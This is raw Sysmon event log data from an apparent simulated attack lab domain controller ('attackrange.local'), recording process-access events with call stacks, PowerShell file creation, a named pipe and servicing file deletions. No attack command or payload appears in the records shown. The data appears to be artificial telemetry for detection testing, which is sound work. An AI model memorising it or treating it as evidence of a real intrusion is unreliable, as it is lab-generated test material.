12:00:02.185{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1000-00000000AD01}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000703Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.170{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000702Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.170{266CAFBE-62C8-6064-0500-00000000AD01}620636C:\Windows\system32\csrss.exe{266CAFBE-6442-6064-E102-00000000AD01}2744C:\Windows\System32\wsqmcons.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000701Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.170{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000700Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.170{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000699Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.170{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000698Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.170{266CAFBE-62DD-6064-1000-00000000AD01}11442132C:\Windows\system32\svchost.exe{266CAFBE-6442-6064-E102-00000000AD01}2744C:\Windows\System32\wsqmcons.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a7a1|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65bf5|C:\Windows\SYSTEM32\ntdll.dll+658fd|C:\Windows\SYSTEM32\ntdll.dll+65760|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000697Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.170{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000696Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.170{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000695Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.170{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000694Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.170{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000693Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.170{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000692Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.170{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62DD-6064-1000-00000000AD01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000691Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.170{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62DD-6064-1000-00000000AD01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000855Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:03.248{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000854Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:03.248{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000853Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:03.248{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000852Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:03.201{266CAFBE-6442-6064-E902-00000000AD01}4516ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000851Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:03.045{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-6442-6064-E902-00000000AD01}4516C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000850Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:03.045{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-6442-6064-E902-00000000AD01}4516C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x8000000000000000849Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:03.014{266CAFBE-6442-6064-E902-00000000AD01}4516\PSHost.132616656029554505.4516.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000848Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.998{266CAFBE-6442-6064-E902-00000000AD01}4516ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_5flf4ai4.1n3.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000847Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.998{266CAFBE-6442-6064-E902-00000000AD01}4516ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ka0f1qlp.tun.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000846Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.998{266CAFBE-6442-6064-E902-00000000AD01}4516C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ka0f1qlp.tun.ps12021-03-31 12:00:02.998 23542300x8000000000000000949Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.983{266CAFBE-642D-6064-9002-00000000AD01}4580NT AUTHORITY\SYSTEMC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exeC:\Windows\System32\config\COMPONENTS{5a78f163-4b54-11e6-80cb-e41d2d012050}.TxR.1.regtrans-msMD5=B6D81B360A5672D80C27430F39153E2C,SHA256=30E14955EBF1352266DC2FF8067E68104607E750ABB9D3B36582B8AF909FCB58,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x8000000000000000948Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.983{266CAFBE-6444-6064-ED02-00000000AD01}1660ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000947Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.967{266CAFBE-642D-6064-9002-00000000AD01}4580NT AUTHORITY\SYSTEMC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exeC:\Windows\System32\config\COMPONENTS{5a78f163-4b54-11e6-80cb-e41d2d012050}.TxR.0.regtrans-msMD5=8A477B539A426B3043BC8B1AC8B77849,SHA256=9F734458D445A7D7C50A3606CD09CA7717C53EDAA32423FCA643778E8CF109F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000946Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.905{266CAFBE-642D-6064-9002-00000000AD01}4580NT AUTHORITY\SYSTEMC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exeC:\Windows\System32\SMI\Store\Machine\SCHEMA.DAT{5a78f17c-4b54-11e6-80cb-e41d2d012050}.TxR.blfMD5=4681B988DE2D937FC552F9724E2118CA,SHA256=573D77DA1E6836AFF3F403D89822C39903654C9F0D58973238321C4E1E1629A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000945Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.889{266CAFBE-642D-6064-9002-00000000AD01}4580NT AUTHORITY\SYSTEMC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exeC:\Windows\System32\SMI\Store\Machine\SCHEMA.DAT{5a78f17c-4b54-11e6-80cb-e41d2d012050}.TxR.2.regtrans-msMD5=B6D81B360A5672D80C27430F39153E2C,SHA256=30E14955EBF1352266DC2FF8067E68104607E750ABB9D3B36582B8AF909FCB58,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x8000000000000000944Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.873{266CAFBE-642D-6064-9002-00000000AD01}4580NT AUTHORITY\SYSTEMC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exeC:\Windows\System32\SMI\Store\Machine\SCHEMA.DAT{5a78f17c-4b54-11e6-80cb-e41d2d012050}.TxR.1.regtrans-msMD5=B6D81B360A5672D80C27430F39153E2C,SHA256=30E14955EBF1352266DC2FF8067E68104607E750ABB9D3B36582B8AF909FCB58,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x8000000000000000943Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.858{266CAFBE-642D-6064-9002-00000000AD01}4580NT 